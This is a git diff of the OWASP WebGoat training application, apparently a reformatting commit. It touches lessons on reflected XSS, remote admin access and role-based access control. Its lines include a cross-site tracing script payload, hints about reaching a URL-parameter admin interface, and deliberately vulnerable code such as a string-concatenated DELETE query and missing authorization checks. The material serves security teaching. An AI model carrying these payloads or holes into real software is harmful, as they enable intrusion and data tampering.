-    //	<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText;document.write(str1);}</script>
-    /**
-     *  Gets the instructions attribute of the WeakAccessControl object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script and do something bad.";
-	return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(120);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the AccessControlScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return "Reflected XSS Attacks";
-    }
-    
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java
index 2d673d925..81d1f9e63 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java
@@ -1,115 +1,112 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    October 28, 2003
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 public class RemoteAdminFlaw extends LessonAdapter
 {
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
-	
+
 		if (s.completedHackableAdmin())
 		{
-		    makeSuccess(s);
+			makeSuccess(s);
 		}
 		else
 		{
-		    ec.addElement("WebGoat has an admin interface.  To 'complete' this lesson you must figure "
-				    + "out how to access the administrative interface for WebGoat.");
+			ec.addElement("WebGoat has an admin interface.  To 'complete' this lesson you must figure "
+					+ "out how to access the administrative interface for WebGoat.");
 		}
 		return ec;
 
-    }
+	}
 
+	/**
+	 * Gets the category attribute of the ForgotPassword object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.ACCESS_CONTROL;
+	}
 
-    /**
-     *  Gets the category attribute of the ForgotPassword object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-    	return Category.ACCESS_CONTROL;
-    }
+	/**
+	 * Gets the hints attribute of the HelloScreen object
+	 * 
+	 * @return The hints value
+	 */
+	public List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("WebGoat has 2 admin interfaces.");
+		hints.add("WebGoat has one admin interface that is controlled via a URL parameter and is 'hackable'");
+		hints
+				.add("WebGoat has one admin interface that is controlled via server side security constraints and should not be 'hackable'");
+		hints.add("Follow the Source!");
 
+		return hints;
+	}
 
-    /**
-     *  Gets the hints attribute of the HelloScreen object
-     *
-     * @return    The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints.add("WebGoat has 2 admin interfaces.");
-	hints.add("WebGoat has one admin interface that is controlled via a URL parameter and is 'hackable'");
-	hints.add("WebGoat has one admin interface that is controlled via server side security constraints and should not be 'hackable'");
-	hints.add("Follow the Source!");
+	private final static Integer DEFAULT_RANKING = new Integer(160);
 
-	return hints;
-    }
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    private final static Integer DEFAULT_RANKING = new Integer(160);
-
-
-    protected Integer getDefaultRanking()
-    {
-    	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the HelloScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-    	return ("Remote Admin Access");
-    }
+	/**
+	 * Gets the title attribute of the HelloScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Remote Admin Access");
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
index 0a21282c1..9550f533e 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons.RoleBasedAccessControl;
 
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
@@ -13,167 +13,143 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class DeleteProfile extends DefaultLessonAction
 {
 
-    private LessonAction chainedAction;
+	private LessonAction chainedAction;
 
-
-    public DeleteProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName, LessonAction chainedAction)
-    {
-	super(lesson, lessonName, actionName);
-	this.chainedAction = chainedAction;
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException,
-	    ValidationException
-    {
-	getLesson().setCurrentAction(s, getActionName());
-
-	int userId = getIntSessionAttribute(s, getLessonName() + "."
-		+ RoleBasedAccessControl.USER_ID);
-	int employeeId = s.getParser().getIntParameter(
-		RoleBasedAccessControl.EMPLOYEE_ID);
-
-	if (isAuthenticated(s))
+	public DeleteProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
 	{
-	    deleteEmployeeProfile(s, userId, employeeId);
-
-	    try
-	    {
-		chainedAction.handleRequest(s);
-	    }
-	    catch (UnauthenticatedException ue1)
-	    {
-		System.out.println("Internal server error");
-		ue1.printStackTrace();
-	    }
-	    catch (UnauthorizedException ue2)
-	    {
-		System.out.println("Internal server error");
-		ue2.printStackTrace();
-	    }
+		super(lesson, lessonName, actionName);
+		this.chainedAction = chainedAction;
 	}
-	else
-	    throw new UnauthenticatedException();
 
-	updateLessonStatus(s);
-    }
-
-
-    public String getNextPage(WebSession s)
-    {
-	return RoleBasedAccessControl.LISTSTAFF_ACTION;
-    }
-
-
-    public void deleteEmployeeProfile(WebSession s, int userId, int employeeId)
-	    throws UnauthorizedException
-    {
-	try
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException, ValidationException
 	{
-	    // Note: The password field is ONLY set by ChangePassword
-	    String query = "DELETE FROM employee WHERE userid = " + employeeId;
-	    //System.out.println("Query:  " + query);
-	    try
-	    {
-		Statement statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		statement.executeUpdate(query);
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error deleting employee profile");
-		sqle.printStackTrace();
-	    }
+		getLesson().setCurrentAction(s, getActionName());
+
+		int userId = getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
+		int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID);
+
+		if (isAuthenticated(s))
+		{
+			deleteEmployeeProfile(s, userId, employeeId);
+
+			try
+			{
+				chainedAction.handleRequest(s);
+			} catch (UnauthenticatedException ue1)
+			{
+				System.out.println("Internal server error");
+				ue1.printStackTrace();
+			} catch (UnauthorizedException ue2)
+			{
+				System.out.println("Internal server error");
+				ue2.printStackTrace();
+			}
+		}
+		else
+			throw new UnauthenticatedException();
+
+		updateLessonStatus(s);
 	}
-	catch (Exception e)
+
+	public String getNextPage(WebSession s)
 	{
-	    s.setMessage("Error deleting employee profile");
-	    e.printStackTrace();
+		return RoleBasedAccessControl.LISTSTAFF_ACTION;
 	}
-    }
 
-
-    public void deleteEmployeeProfile_BACKUP(WebSession s, int userId,
-	    int employeeId) throws UnauthorizedException
-    {
-	try
+	public void deleteEmployeeProfile(WebSession s, int userId, int employeeId) throws UnauthorizedException
 	{
-	    // Note: The password field is ONLY set by ChangePassword
-	    String query = "DELETE FROM employee WHERE userid = " + employeeId;
-	    //System.out.println("Query:  " + query);
-	    try
-	    {
-		Statement statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		statement.executeUpdate(query);
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error deleting employee profile");
-		sqle.printStackTrace();
-	    }
+		try
+		{
+			// Note: The password field is ONLY set by ChangePassword
+			String query = "DELETE FROM employee WHERE userid = " + employeeId;
+			// System.out.println("Query: " + query);
+			try
+			{
+				Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																					ResultSet.CONCUR_READ_ONLY);
+				statement.executeUpdate(query);
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error deleting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error deleting employee profile");
+			e.printStackTrace();
+		}
 	}
-	catch (Exception e)
+
+	public void deleteEmployeeProfile_BACKUP(WebSession s, int userId, int employeeId) throws UnauthorizedException
 	{
-	    s.setMessage("Error deleting employee profile");
-	    e.printStackTrace();
+		try
+		{
+			// Note: The password field is ONLY set by ChangePassword
+			String query = "DELETE FROM employee WHERE userid = " + employeeId;
+			// System.out.println("Query: " + query);
+			try
+			{
+				Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																					ResultSet.CONCUR_READ_ONLY);
+				statement.executeUpdate(query);
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error deleting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error deleting employee profile");
+			e.printStackTrace();
+		}
 	}
-    }
 
-
-    private void updateLessonStatus(WebSession s)
-    {
-	// If the logged in user is not authorized to be here, stage 1 is complete.
-	if (RoleBasedAccessControl.STAGE1.equals(getStage(s))) 
-	try
+	private void updateLessonStatus(WebSession s)
 	{
-	    int userId = getIntSessionAttribute(s, getLessonName() + "."
-		    + RoleBasedAccessControl.USER_ID);
+		// If the logged in user is not authorized to be here, stage 1 is complete.
+		if (RoleBasedAccessControl.STAGE1.equals(getStage(s))) try
+		{
+			int userId = getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
 
-	    if (!isAuthorized(s, userId,
-		    RoleBasedAccessControl.DELETEPROFILE_ACTION))
-	    {
-		setStageComplete(s, RoleBasedAccessControl.STAGE1);
-	    }
+			if (!isAuthorized(s, userId, RoleBasedAccessControl.DELETEPROFILE_ACTION))
+			{
+				setStageComplete(s, RoleBasedAccessControl.STAGE1);
+			}
+		} catch (ParameterNotFoundException e)
+		{
+		}
 	}
-	catch (ParameterNotFoundException e)
-	{}
-    }
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java
index 544e1786f..bbc25d502 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons.RoleBasedAccessControl;
 
 import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.session.Employee;
@@ -12,187 +12,154 @@ import org.owasp.webgoat.session.UnauthenticatedException;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class EditProfile extends DefaultLessonAction
 {
 
-    public EditProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName)
-    {
-	super(lesson, lessonName, actionName);
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException
-    {
-	getLesson().setCurrentAction(s, getActionName());
-
-	if (isAuthenticated(s))
+	public EditProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
 	{
-	    int userId = getUserId(s);
-	    int employeeId = s.getParser().getIntParameter(
-		    RoleBasedAccessControl.EMPLOYEE_ID);
-
-	    Employee employee = getEmployeeProfile(s, userId, employeeId);
-	    setSessionAttribute(s, getLessonName() + "."
-		    + RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY, employee);
+		super(lesson, lessonName, actionName);
 	}
-	else
-	    throw new UnauthenticatedException();
-    }
 
-
-    public String getNextPage(WebSession s)
-    {
-	return RoleBasedAccessControl.EDITPROFILE_ACTION;
-    }
-
-
-    public Employee getEmployeeProfile(WebSession s, int userId,
-	    int subjectUserId) throws UnauthorizedException
-    {
-	Employee profile = null;
-
-	// Query the database for the profile data of the given employee
-	try
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException
 	{
-	    String query = "SELECT * FROM employee WHERE userid = ?";
+		getLesson().setCurrentAction(s, getActionName());
 
-	    try
-	    {
-		PreparedStatement answer_statement = WebSession
-			.getConnection(s).prepareStatement(query,
-				ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		answer_statement.setInt(1, subjectUserId);
-		ResultSet answer_results = answer_statement.executeQuery();
-		if (answer_results.next())
+		if (isAuthenticated(s))
 		{
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(answer_results.getInt("userid"),
-			    answer_results.getString("first_name"),
-			    answer_results.getString("last_name"),
-			    answer_results.getString("ssn"), answer_results
-				    .getString("title"), answer_results
-				    .getString("phone"), answer_results
-				    .getString("address1"), answer_results
-				    .getString("address2"), answer_results
-				    .getInt("manager"), answer_results
-				    .getString("start_date"), answer_results
-				    .getInt("salary"), answer_results
-				    .getString("ccn"), answer_results
-				    .getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employee profile");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employee profile");
-	    e.printStackTrace();
+			int userId = getUserId(s);
+			int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID);
+
+			Employee employee = getEmployeeProfile(s, userId, employeeId);
+			setSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY, employee);
+		}
+		else
+			throw new UnauthenticatedException();
 	}
 
-	return profile;
-    }
-
-
-    public Employee getEmployeeProfile_BACKUP(WebSession s, int userId,
-	    int subjectUserId) throws UnauthorizedException
-    {
-	// Query the database to determine if this employee has access to this function
-	// Query the database for the profile data of the given employee if "owned" by the given user
-
-	Employee profile = null;
-
-	// Query the database for the profile data of the given employee
-	try
+	public String getNextPage(WebSession s)
 	{
-	    String query = "SELECT * FROM employee WHERE userid = ?";
+		return RoleBasedAccessControl.EDITPROFILE_ACTION;
+	}
 
-	    try
-	    {
-		PreparedStatement answer_statement = WebSession
-			.getConnection(s).prepareStatement(query,
-				ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		answer_statement.setInt(1, subjectUserId);
-		ResultSet answer_results = answer_statement.executeQuery();
-		if (answer_results.next())
+	public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
+	{
+		Employee profile = null;
+
+		// Query the database for the profile data of the given employee
+		try
 		{
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(answer_results.getInt("userid"),
-			    answer_results.getString("first_name"),
-			    answer_results.getString("last_name"),
-			    answer_results.getString("ssn"), answer_results
-				    .getString("title"), answer_results
-				    .getString("phone"), answer_results
-				    .getString("address1"), answer_results
-				    .getString("address2"), answer_results
-				    .getInt("manager"), answer_results
-				    .getString("start_date"), answer_results
-				    .getInt("salary"), answer_results
-				    .getString("ccn"), answer_results
-				    .getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employee profile");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employee profile");
-	    e.printStackTrace();
+			String query = "SELECT * FROM employee WHERE userid = ?";
+
+			try
+			{
+				PreparedStatement answer_statement = WebSession.getConnection(s)
+						.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				answer_statement.setInt(1, subjectUserId);
+				ResultSet answer_results = answer_statement.executeQuery();
+				if (answer_results.next())
+				{
+					// Note: Do NOT get the password field.
+					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
+							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
+									.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employee profile");
+			e.printStackTrace();
+		}
+
+		return profile;
 	}
 
-	return profile;
-    }
+	public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
+	{
+		// Query the database to determine if this employee has access to this function
+		// Query the database for the profile data of the given employee if "owned" by the given
+		// user
+
+		Employee profile = null;
+
+		// Query the database for the profile data of the given employee
+		try
+		{
+			String query = "SELECT * FROM employee WHERE userid = ?";
+
+			try
+			{
+				PreparedStatement answer_statement = WebSession.getConnection(s)
+						.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				answer_statement.setInt(1, subjectUserId);
+				ResultSet answer_results = answer_statement.executeQuery();
+				if (answer_results.next())
+				{
+					// Note: Do NOT get the password field.
+					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
+							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
+									.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employee profile");
+			e.printStackTrace();
+		}
+
+		return profile;
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java
index cdc541c22..c4b8aaf55 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons.RoleBasedAccessControl;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.ElementContainer;
 import org.owasp.webgoat.lessons.Category;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
@@ -19,426 +19,400 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class RoleBasedAccessControl extends GoatHillsFinancial
 {
-    private final static Integer DEFAULT_RANKING = new Integer(125);
+	private final static Integer DEFAULT_RANKING = new Integer(125);
 
-    public final static String STAGE1 = "Bypass Business Layer Access Control";
-    
-    public final static String STAGE2 = "Add Business Layer Access Control";
-    
-    public final static String STAGE3 = "Bypass Data Layer Access Control";
-    
-    public final static String STAGE4 = "Add Data Layer Access Control";
+	public final static String STAGE1 = "Bypass Business Layer Access Control";
 
-    protected void registerActions(String className) {
-    	registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
-    	registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
-    	registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
-    	registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
-    	registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+	public final static String STAGE2 = "Add Business Layer Access Control";
 
-    	// These actions are special in that they chain to other actions.
-    	registerAction(new Login(this, className, LOGIN_ACTION,
-    		getAction(LISTSTAFF_ACTION)));
-    	registerAction(new Logout(this, className, LOGOUT_ACTION,
-    		getAction(LOGIN_ACTION)));
-    	registerAction(new FindProfile(this, className, FINDPROFILE_ACTION,
-    		getAction(VIEWPROFILE_ACTION)));
-    	registerAction(new UpdateProfile(this, className,
-    		UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-    	registerAction(new DeleteProfile(this, className,
-    		DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
-    }
+	public final static String STAGE3 = "Bypass Data Layer Access Control";
 
-    /**
-     *  Gets the category attribute of the CommandInjection object
-     *
-     * @return    The category value
-     */
-    public Category getDefaultCategory()
-    {
-	return Category.ACCESS_CONTROL;
-    }
+	public final static String STAGE4 = "Add Data Layer Access Control";
 
-    /**
